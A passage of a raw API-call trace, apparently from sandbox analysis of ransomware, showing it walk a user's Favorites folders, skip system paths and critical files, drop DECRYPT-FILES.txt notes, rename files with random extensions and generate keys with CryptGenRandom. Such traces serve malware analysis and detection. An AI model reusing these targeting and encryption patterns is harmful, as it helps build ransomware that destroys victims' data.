lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.706] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.706] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.706] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.706] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.706] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.706] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.706] lstrlenA (lpString="DELETEATOM") returned 10 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.706] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.706] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.706] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.706] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.706] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.706] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.706] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.706] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.706] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.706] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.707] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.707] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.707] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.707] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.707] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.707] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.707] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.707] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.707] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.707] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.707] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.707] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.707] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.707] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.707] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.707] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.707] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.707] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.707] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.708] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.708] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.708] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.708] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.708] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.708] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.708] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.708] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.708] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.708] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.708] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.708] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.708] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.708] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.708] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ") returned 73 [0185.709] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ.HJaclJS") returned 81 [0185.709] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.0l2uj"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.0L2uJ.HJaclJS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.0l2uj.hjacljs"), dwFlags=0x0) returned 1 [0185.709] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.710] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.710] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.710] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef2db20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url.0L2uJ", cAlternateFileName="MSNBCN~1.0L2")) returned 0 [0185.710] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.710] CloseHandle (hObject=0x25c) returned 1 [0185.710] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefc60a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefc60a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0185.710] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0185.710] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0185.710] lstrcatW (in: lpString1="Windows Live", lpString2="\\" | out: lpString1="Windows Live\\") returned="Windows Live\\" [0185.710] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Program Files") returned 0x0 [0185.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch=":\\Windows") returned 0x0 [0185.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Games\\") returned 0x0 [0185.710] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\All Users") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="AhnLab") returned 0x0 [0185.711] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.711] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.711] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\0a16c9.tmp") returned 64 [0185.711] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.713] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.713] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt") returned 71 [0185.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.713] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*" [0185.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1671fc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1671fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.713] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1671fc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1671fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.714] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1671fc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1671fc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1671fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.714] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.714] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.714] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.714] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.714] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.714] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.714] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.714] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.714] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.714] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\0a16c9.tmp" [0185.714] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.714] CloseHandle (hObject=0x0) returned 0 [0185.714] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.715] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef2db20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaef2db20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaef53c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.715] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.715] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef53c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url.daOcq", cAlternateFileName="GETWIN~1.DAO")) returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="DECRYPT-FILES.txt") returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="autorun.inf") returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="boot.ini") returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="desktop.ini") returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="ntuser.dat") returned -1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="iconcache.db") returned -1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="bootsect.bak") returned 1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="ntuser.dat.log") returned -1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="thumbs.db") returned -1 [0185.715] lstrcmpiW (lpString1="Get Windows Live.url.daOcq", lpString2="Bootfont.bin") returned 1 [0185.715] lstrlenW (lpString="Get Windows Live.url.daOcq") returned 26 [0185.715] lstrcmpiW (lpString1="daOcq", lpString2="lnk") returned -1 [0185.715] lstrcmpiW (lpString1="daOcq", lpString2="exe") returned -1 [0185.715] lstrcmpiW (lpString1="daOcq", lpString2="sys") returned -1 [0185.715] lstrcmpiW (lpString1="daOcq", lpString2="dll") returned -1 [0185.715] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.715] lstrlenW (lpString="Get Windows Live.url.daOcq") returned 26 [0185.715] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.715] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url.daOcq" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq" [0185.715] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.daOcq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.daocq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.716] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.716] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.716] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.716] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.716] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.716] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 